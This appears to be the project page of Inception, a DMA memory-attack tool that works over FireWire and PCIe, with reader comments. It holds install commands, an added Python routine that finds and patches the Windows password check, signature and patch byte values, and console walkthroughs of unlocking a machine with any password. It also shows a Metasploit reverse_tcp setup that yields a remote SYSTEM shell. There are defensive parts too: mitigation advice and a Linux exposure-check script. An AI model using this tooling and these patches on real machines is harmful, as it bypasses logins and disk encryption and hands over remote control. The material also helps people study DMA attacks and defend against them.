Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.

Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works

Inception’s modules work as follows: by presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE 1394 (FireWire) interface, the tool makes the victim operating system believe that an SBP-2 device has been connected to the FireWire port. Since SBP-2 devices rely on Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool then has full read/write access to the lower 4 GiB of RAM on the victim.

Once DMA is granted, the tool searches the reachable memory pages for known byte signatures at particular offsets within the operating system’s code. Once a signature is found, the tool patches that code. For instance, the unlock module short-circuits the branch in the operating system’s password validation routine that rejects an incorrect password.

After running that module you should be able to log into the victim machine using any password.

An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
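
Added example, not Inception’s own code: the search-and-patch loop described above, run against a memory image file instead of a live FireWire target. The MemoryImage class is a stand-in for the forensic1394 device object the tool drives (read and write at a physical address); PAGE_SIZE, find_signature, patch_and_verify and the constructed test image are assumptions made for this example. The signature/patch pair and the two page offsets are the Windows XP SP3 msv1_0.dll values quoted in the comment thread at the bottom of this page and serve only as illustrative input; the current tool ships its own, newer signatures.

```python
import os
import random
import tempfile

PAGE_SIZE = 4096
DMA_LIMIT = 1 << 32  # a FireWire (OHCI) initiator can only address the low 4 GiB

# Signature/patch pair as quoted for Windows XP SP3 msv1_0.dll in the comment
# thread below; used here purely as illustrative input.
#   83 f8 10   cmp eax, 0x10
#   75 11      jne short +0x11   <- replaced by two NOPs (90 90)
#   b0 01      mov al, 1
#   8b ..      mov ...
XP_SP3_TARGET = {
    "name": "Windows XP SP3 MsvpPasswordValidate",
    "signature": bytes.fromhex("83f8107511b0018b"),
    "patch": bytes.fromhex("83f8109090b0018b"),
    "offsets": [0x8aa, 0x862],  # page offsets reported for different builds
}


class MemoryImage:
    """File-backed stand-in for the DMA device: read/write by physical address."""

    def __init__(self, path):
        self.fh = open(path, "r+b")
        self.size = os.path.getsize(path)

    def read(self, addr, length):
        self.fh.seek(addr)
        return self.fh.read(length)

    def write(self, addr, data):
        self.fh.seek(addr)
        self.fh.write(data)
        self.fh.flush()

    def close(self):
        self.fh.close()


def find_signature(mem, target, start=0, end=DMA_LIMIT):
    """Walk memory page by page; return (address, page_no) of the first hit, else None."""
    sig = target["signature"]
    end = min(end, getattr(mem, "size", end))
    for addr in range(start, end, PAGE_SIZE):
        page = mem.read(addr, PAGE_SIZE)
        if len(page) < PAGE_SIZE:
            break  # ran off the end of the image
        # A page that is all 0x00 or all 0xff is almost always an address that
        # does not map to RAM (or a target that never granted DMA): skip it.
        if page.count(page[:1]) == PAGE_SIZE:
            continue
        for off in target["offsets"]:
            if page[off:off + len(sig)] == sig:
                return addr + off, addr // PAGE_SIZE
    return None


def patch_and_verify(mem, addr, target):
    """Overwrite the signature with the patch, read it back, return the original bytes."""
    patch = target["patch"]
    original = mem.read(addr, len(patch))
    if original != target["signature"]:
        raise ValueError("no signature at 0x%x" % addr)
    mem.write(addr, patch)
    if mem.read(addr, len(patch)) != patch:
        raise RuntimeError("patch did not stick at 0x%x" % addr)
    return original


def build_test_image(path, pages=64, sig_page=58, offset=0x8aa):
    """Constructed image: pseudo-random filler with the signature planted in one page."""
    rng = random.Random(1)
    with open(path, "wb") as f:
        for n in range(pages):
            page = bytearray(rng.getrandbits(8) for _ in range(PAGE_SIZE))
            if n == sig_page:
                sig = XP_SP3_TARGET["signature"]
                page[offset:offset + len(sig)] = sig
            f.write(page)


def demo():
    path = os.path.join(tempfile.mkdtemp(), "target.mem")
    build_test_image(path)
    mem = MemoryImage(path)
    try:
        hit = find_signature(mem, XP_SP3_TARGET)
        if hit is None:
            return None
        addr, page_no = hit
        original = patch_and_verify(mem, addr, XP_SP3_TARGET)
        patched = mem.read(addr, len(original))
        mem.write(addr, original)  # undo, as you would after a demo on a live box
        return {"addr": addr, "page": page_no, "patched": patched,
                "restored": mem.read(addr, len(original)) == original}
    finally:
        mem.close()


if __name__ == "__main__":
    r = demo()
    print("Signature found at 0x%x in page no. %d" % (r["addr"], r["page"]))
```

Three details the prose glosses over: the loop never reads above 4 GiB (the OHCI limit discussed under Caveats); it skips pages that read back as all 0x00 or all 0xff, which is what unmapped addresses or a target that never granted DMA look like; and it only declares success after reading the patch back, which is what the “Patch verified” line in the tool output further down means.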

Awesome! But why?

The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!

Key data

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Requirements

Inception requires:

  • Hardware:
    • Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
    • Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
  • Software:
    • Python 3
    • git
    • gcc (incl. g++)
    • cmake
    • pip (for automatic resolution of dependencies)
    • libforensic1394
    • msgpack

Installation

On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

General usage

  1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
  2. Run Inception

Simply type:

incept [module name]

For a more complete and up-to-date description, please run:

incept -h

or see the tool home page.

Modules

As of version 0.4.0, Inception has been modularized. The current modules, and their functionality is described below.

For detailed options on usage, run:

incept [module name] -h

Note: OS X 10.8.2 and later on Ivy Bridge Macs (2012 and newer) enable VT-d, which blocks the DMA requests and thwarts almost all modules. Look for vtd[0] fault entries in your log/console.

Unlock

The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered-on machine you have physical access to. The module is primarily intended for use against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec; there are plenty of other (and better) ways to hack a machine that is not encrypted.

The unlock module is stable on machines with 4 GiB of main memory or less. If the target has more than that, you need to be lucky for the signatures to be mapped to a physical page frame that the tool can reach (the lower 4 GiB).

As of this version, it is able to unlock the following x86 and x64 operating systems:

OS             Version         Unlock lock screen   Escalate privileges
Windows 8      8.1             Yes                  Yes
Windows 8      8.0             Yes                  Yes
Windows 7      SP1             Yes                  Yes
Windows 7      SP0             Yes                  Yes
Windows Vista  SP2             Yes                  Yes
Windows Vista  SP1             Yes                  Yes
Windows Vista  SP0             Yes                  Yes
Windows XP     SP3             Yes                  Yes
Windows XP     SP2             Yes                  Yes
Windows XP     SP1             -                    -
Windows XP     SP0             -                    -
Mac OS X       Mavericks       Yes (1)              Yes (1)
Mac OS X       Mountain Lion   Yes (2)              Yes (2)
Mac OS X       Lion            Yes (2)              Yes (2)
Mac OS X       Snow Leopard    Yes                  Yes
Mac OS X       Leopard         -                    -
Ubuntu (3)     Saucy           Yes                  Yes
Ubuntu         Raring          Yes                  Yes
Ubuntu         Quantal         Yes                  Yes
Ubuntu         Precise         Yes                  Yes
Ubuntu         Oneiric         Yes                  Yes
Ubuntu         Natty           Yes                  Yes
Linux Mint     13              Yes                  Yes
Linux Mint     12              Yes                  Yes

(1): OS X 10.8.2 and later on Ivy Bridge Macs (2012 and newer) enable VT-d, effectively blocking DMA requests and thwarting this attack. Look for vtd[0] fault entries in your log/console.
(2): If FileVault 2 is enabled, the tool will only work while the operating system is unlocked, as of OS X Lion.
(3): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.

Because any password is accepted once the patch is in place, the module also enables escalation of privileges, for instance via the runas (Windows) or sudo -s (OS X/Linux) commands, respectively.

Execution

To unlock, simply type:

incept unlock

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):

[1] Windows 8 MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7 MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu libpam unlock/privilege escalation
[7] Linux Mint libpam unlock/privilege escalation

[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============>                                                ]  227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

Implant

The implant module implants a (potentially memory-only) Metasploit payload directly to the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.

The current version only works as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.

Execution

To use it, start msfrpcd:

msfrpcd -P [password]

Then launch inception:

incept implant --msfpw [password] --msfopts [options]

As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd daemon, and then launch a console listening for callbacks.

msfrpcd -P password
msfconsole

In the console, we configure the receiving end of the payload. We set the EXITFUNC option to thread to ensure that the target process stays alive if something should go awry:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j

Then, in another terminal, we launch Inception:

incept implant --msfpw password --msfopts LHOST=172.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future. If you want to
    change this, send me a wad of cash in unmarked dollar bills or a pull
    request on github.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

In your MSF console, you should see something similar to this:

msf exploit(handler) > [*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Troubleshooting

Not working you say? Here’s a couple of hints:

  • First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
  • Make sure you are actually connected with an IEEE 1394 FireWire cable (FireWire-to-USB converters etc. won’t work, but 4/6/9-pin FireWire adapters do). Doh.
  • “No FireWire devices detected on the bus”
    • First, try running the tool again.
    • If you get this error message, try a different cable and/or a couple of converters to go from a 6/9-pin FireWire connector to 4-pin and back again. 6/9-pin FireWire cables are capable of carrying power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), and this is known to cause trouble.
    • Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using an ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
  • Are you sure you’re getting DMA? Sometimes the target machine needs an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) to install the FireWire drivers and lower the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/–verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, it is all right with a yellow exclamation mark by the device; the tool should work nevertheless.
  • Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
  • Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
  • Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
  • Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
  • Try again. Sometimes the DMA shield fails to lower on the first try/tries.

Known bugs

  • Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.

*) Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool looks for may be loaded at a physical address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, searching for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that don’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/the screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
  • If you have an OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Attack mitigation

To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:

Windows

OS X

  • Don’t panic – if you are using FileVault 2 on OS X Lion 10.7.2 or higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
  • Set a firmware password

Linux

All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.
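
An added example for the Linux side, not from this page or the Inception project: the DMA grant the tool depends on happens when the kernel’s SBP-2 driver (firewire-sbp2 on the Juju stack, sbp2 on the old ieee1394 stack) logs in to the fake unit, so the narrow Linux mitigation is to keep that driver from ever loading, and the blunt one is to block the host controller driver (firewire-ohci / ohci1394) as well. The script reads a /proc/modules-style file and the *.conf files of a modprobe.d directory and reports whether the host is exposed. The file paths are parameters so that it runs here against constructed fixtures; the handling of ‘install NAME /bin/false’ as a block and the decision rule in assess() are this example’s own assumptions about what counts as blocked.

```python
import os
import re
import tempfile

# Modules that perform the SBP-2 login and thereby hand DMA to whatever is on
# the bus: firewire-sbp2 (the "Juju" stack, kernel >= 2.6.22) and sbp2 (the
# old ieee1394 stack). Blocking both is the narrow fix; blocking the host
# controller driver (firewire-ohci / ohci1394) disables FireWire altogether.
SBP2_MODULES = ("firewire-sbp2", "sbp2")
OHCI_MODULES = ("firewire-ohci", "ohci1394")


def _norm(name):
    return name.replace("-", "_")  # modprobe treats '-' and '_' as the same


def loaded_modules(proc_modules):
    """Module names from a /proc/modules-style file (first column)."""
    names = set()
    with open(proc_modules) as f:
        for line in f:
            parts = line.split()
            if parts:
                names.add(_norm(parts[0]))
    return names


def blocked_modules(modprobe_dir):
    """Modules disabled in *.conf under modprobe_dir by 'blacklist NAME' or
    'install NAME /bin/false' (or /bin/true). A plain blacklist only stops
    alias-based autoload, which is what a hotplugged SBP-2 unit triggers; the
    install override also defeats an explicit modprobe (assumed rule)."""
    names = set()
    if not os.path.isdir(modprobe_dir):
        return names
    for fn in sorted(os.listdir(modprobe_dir)):
        if not fn.endswith(".conf"):
            continue
        with open(os.path.join(modprobe_dir, fn)) as f:
            for raw in f:
                line = raw.split("#", 1)[0].strip()
                m = re.match(r"(?:blacklist\s+(\S+)|install\s+(\S+)\s+/bin/(?:false|true))$", line)
                if m:
                    names.add(_norm(m.group(1) or m.group(2)))
    return names


def assess(proc_modules, modprobe_dir):
    """Exposed if the SBP-2 driver is already loaded, or can still be autoloaded
    the moment a FireWire controller sees an SBP-2 unit directory."""
    loaded = loaded_modules(proc_modules)
    blocked = blocked_modules(modprobe_dir)
    sbp2_loaded = any(_norm(m) in loaded for m in SBP2_MODULES)
    ohci_loaded = any(_norm(m) in loaded for m in OHCI_MODULES)
    sbp2_blocked = all(_norm(m) in blocked for m in SBP2_MODULES)
    return {
        "sbp2_loaded": sbp2_loaded,
        "ohci_loaded": ohci_loaded,
        "sbp2_blocked": sbp2_blocked,
        "exposed": sbp2_loaded or (ohci_loaded and not sbp2_blocked),
    }


def _fixture(modules, conf_lines):
    """Constructed /proc/modules and modprobe.d contents for offline testing."""
    d = tempfile.mkdtemp()
    pm = os.path.join(d, "modules")
    with open(pm, "w") as f:
        for m in modules:
            f.write("%s 40960 0 - Live 0xffffffffc0000000\n" % m)
    md = os.path.join(d, "modprobe.d")
    os.mkdir(md)
    with open(os.path.join(md, "firewire.conf"), "w") as f:
        f.write("".join(l + "\n" for l in conf_lines))
    return pm, md


def demo():
    cases = {
        "stock": (["firewire_ohci", "firewire_core"], []),
        "hardened": (["firewire_ohci", "firewire_core"],
                     ["# never let a hotplugged SBP-2 unit log in",
                      "blacklist firewire-sbp2",
                      "install firewire-sbp2 /bin/false",
                      "blacklist sbp2"]),
        "too_late": (["firewire_sbp2", "firewire_ohci", "firewire_core"],
                     ["blacklist firewire-sbp2", "blacklist sbp2"]),
        "no_firewire": (["e1000e"], []),
    }
    return {name: assess(*_fixture(*spec))["exposed"] for name, spec in cases.items()}


if __name__ == "__main__":
    print(assess("/proc/modules", "/etc/modprobe.d"))
```

On a real host, call assess("/proc/modules", "/etc/modprobe.d"). The "too_late" case matters: a blacklist written after the driver is already resident changes nothing until it is unloaded or the machine reboots. And because ExpressCard/Thunderbolt adapters bring their own controller (see FAQ 7), a host that currently has no FireWire modules loaded is only safe if firewire-ohci is blocked as well.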

History

Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Boileau aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating systems such as Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22, Linux distributions ship with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Hence, Inception was born.

DMA attacks have been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.

FAQ

  1. Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
    A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
  2. Q: Can’t I just use the screen_unlock.rb Metasploit script?
    A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
  3. Q: I use full disk encryption. Your tool is moot.
    A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. See FAQ 1.
  4. Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
    A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
  5. Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
    A: Ahem. See the answer to FAQ 7.
  6. Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
    A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the FireWire specs. All OS vendors that want to include FireWire drivers that are OHCI compliant and work out of the box with SBP-2 devices are vulnerable to some degree.
  7. Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
    A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
  8. Q: Your tool isn’t working.
    A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
    • Your host OS
    • The target OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
    • The target CPU architecture (x86/x64, etc.)
    • Output of the tool
    • Memory size of target

License / donate

The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

If you like the tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:

My Bitcoin address

1ENpY2UTa8fB3nZpc1imZz1vj8zKHcNsxb

245 Responses to “Inception”

  1. killerbiz

    Hi,
    Thks for this great tool !
    Does it work with smartcard logon? (user/passwd deactivated)
    If not it could be great to implement it.
    Best regards,
    Killerbiz

    • Carsten

      Maybe. The smart card reader would have to communicate with the OS in some way, and that communication would necessarily result in pages being loaded into memory and executed. If the smart card reader needs its own authentication modules loaded, I could probably need to reverse engineer the driver to understand how to eliminate the check that verifies your smart card. Unfortunately, I’m not currently in possession of a smart card reader.

      If you have a reader available, try it out. The existing patching of msv1_0.dll may very well work against smart card authentication as well.

      • killerbiz

        Hi,
        Thks for the fast answer.
        I’ll test it against smart card soon and will keep you aware of the result.
        Ciao

        ps: great results on the standard log/pass authent !

  2. tekkenhead

    I had the same problem with windows xp sp2 so I changed the offset and signature to this:

    signature=0x83F8107513B0018B
    pageoffset=0x946
    patch=0x83F8109090B0018B

    I haven’t tried it out. But it should NOP the jump function as in the other OS’s listed. I also had to change the Vista pageoffset to suit my needs as well to get it to work for me.

    • Carsten

      Thanks, I’ll check it out. The vista signature is quite old, so I’m not surprised it has changed. Do you have it available?

  3. tekkenhead

    I wanted to say it’s a great program. So is winlockpwn. I got it to work for Windows XP after tweaking the signature offsets and it was a great way to learn about IDA.

    I was wondering if in the next version of ftwautopwn there could be a way of trying older or multiple pageoffsets instead of manually updating the config.cfg file. If I am not mistaken I think you can only apply multiple patches to the same file now.

    Thanks

    • Carsten

      Thanks. That is exactly what I’m working on: improving signature robustness and parallel search at multiple offsets. Stand by for a new release sometime during the next few weeks.

  4. tekkenhead

    Here is the pageoffset I used for Vista Ultimate with SP1.
    pageoffset=0x80F

    I also wanted to let you know I used a 4 pin cable with a 6 pin male adapter and it worked great.

  5. jan

    I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:

    Please select target (or enter ‘q’ to quit): 6
    [+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
    Phase 1:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x8aa (2218)
    Phase 2:
    Using signature: 0x83f8107511b0018b
    Using patch: 0x83f8109090b0018b
    Using offset: 0x862 (2146)
    SBP2, please wait 1 seconds or press Ctrl+C
    Traceback (most recent call last):
      File “./ftwautopwn.py”, line 80, in <module>
        main(sys.argv[1:])
      File “./ftwautopwn.py”, line 76, in main
        unlock.run(ctx)
      File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 129, in run
        d = initialize_fw(d)
      File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 254, in initialize_fw
        d = b.devices()[0]
    IndexError: list index out of range

    any ideas?

    • jan

      Just a little more info. I booted the target system (thinkpad r500) into ubuntu 9.04 to see if windows was the issue. I get the same error. I did increase the delay time on both systems with no positive result. I took the source computer (thinkpad r500 also) and plugged it into my desktop system. There the ftwautopwn ran but resulted in the same as a previous poster along the lines of

      [+] Searching for signature, 379 MiB so far.
      [-] Looks like we’re not getting any data. We could be outside memory
      boundaries, or simply not have DMA. Try using -v/–verbose to debug.

      so the ftwautopwn can connect to the desktop just fine, but not the laptops (I also tried xp sp3 on a thinkpad r400 as target but can’t connect to it either)

      The target xp laptop can connect to my xp desktop and do filesharing via firewire with no problem, so I know the hardware on all computers is ok.

      I am out of ideas.

      • Carsten

        Hi Jan, unfortunately it is hard for me to debug this remotely. If you are able to use the tool against one machine, but not another, and booting into another OS at the target doesn’t help, it is likely a hardware problem. You could try to create another FireWire port by plugging in an ExpressCard etc. to see if that resolves the issue.

        • jan

          Ordered a new cable and firewire cards to plug into laptop. Will let you know how it goes. Thanks for the reply

          • jan

            FYI,
            I got 2 PC Card FireWire adapters to shove into the laptops, and the program then executes.

            However, I still get no result. what I see is along the lines reported by a previous poster:
            Continue? [Y/n]: y
            [+] Searching for signature, 379 MiB so far.
            [-] Looks like we’re not getting any data. We could be outside memory
            boundaries, or simply not have DMA. Try using -v/–verbose to debug.

            I see it scanning through changing data values, but never finds a match. I tried 3 different computers of XP with SP3 in 2 different languages (eng, and german). No luck. I disassembled the dll file with IDA Pro and the offsets and everything looks ok.

            No clue what is happening, but my chance to demonstrate the party trick has come and gone….

          • Carsten

            That’s weird. Sounds like you are not getting DMA. Maybe you could try to dump the entire memory using the tool volatility and inspect the result? Language should have nothing to do with this.

            Edit: I’ve never had any problems like this using the tool – at least not against Windows XP. The signatures are very stable, and as you say, you were able to disassemble the msv1_0.dll file yourself to confirm them. What kind of hardware are you using on the attacking side?

  6. jan

    Using a thinkpad R500 on the attacking side. I bought 2 types of firewire card, one express card and one pcmcia card, since the laptops have both types of slots. I tried all combinations of configurations but none work. however, the type of card I have in the slot determines the data I get when we are out of memory range. For example, when it reads in the region about 3GB where there is no memory I either see all fffffff or 000000 depending on the card. Where there is memory, I see rapidly changing memory contents, so I think I have access to at least some memory.

    I am going to dig up my old emachines laptop and put the pcmcia card in it to see what is up.

    can you tell me how to do a memory dump using volatility?

  7. marc

    on a windows 7 sp1 32bit:

    the memory location is found and the location patched.
    when I enter a random password, I get an error “RPC service unavailable” and can not login, also not with the correct password. There is no difference if the user is local or a domain user and if there is network connectivity or not.

    any idea how to get this working in such a case?

    • Carsten

      Sounds like a false positive (ie. that there are more than one match in-memory). Do you get this error consistently? I’m working on creating more stable signatures for Win7, both 32 and 64 bit, unfortunately the progress is a bit slow…

      • marc

        Hi Carsten,

        Well, I tried 3 times with the same result (rebooting, and working with the account for some time), so I’d say it’s consistent.

        • Carsten

          Hi Mark sorry for the late reply. As you may see from this page, I’ve been busy coding and renaming the tool. Could you test the new tool against your Win7 box (as described above)?

          The new matching algorithm will hopefully solve your problems.

  8. ncfa

    hi Carsten
    it is really great tool. thank you for that.
    The tool was working for 32-bit systems, but when I tried it on a machine that has 64-bit Windows 7, it didn’t work. I checked the signature and offset value of my system, all is ok, but it is not working. Is there a critical point that might be useful for 64-bit operating systems?

    And also i tried to find signature for Linux and Mac systems. but i couldn’t find any useful info. how can i find the signature and offset values for Linux and Mac operating systems?

    • Beka

      Hi Carsten,
      I did some tests and with the same results as ncfa, Windows 7 32 bits works great but none of the 64 bits workstations seems to work.

      • Carsten

        Hi, thanks for alerting me. On both my 64-bit Win7 machines, inception is working great. Can you open a ticket at github with:

        - Your host OS
        - The target:
          - OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
          - Amount of physical memory (RAM)
        - The target CPU architecture (x86/x64, etc.)
        - Output of the tool

  9. tekkenhead

    Can you give me more info on how to use -f switch in ftwautopwn.py. I have some virtualbox images and would like test. I also have vmware if I need that too. Thanks.

    • Carsten

      Unfortunately, Virtualbox doesn’t store the memory from snapshots in binary data files like VMware, but rather use a compressed (?) format. FTWA does currently not support this format. You can use the -f switch to search through VMware memory (.vmem) files located in your vm folder.

      If you venture into dissecting the virtualbox format, drop me a note.

      • tekkenhead

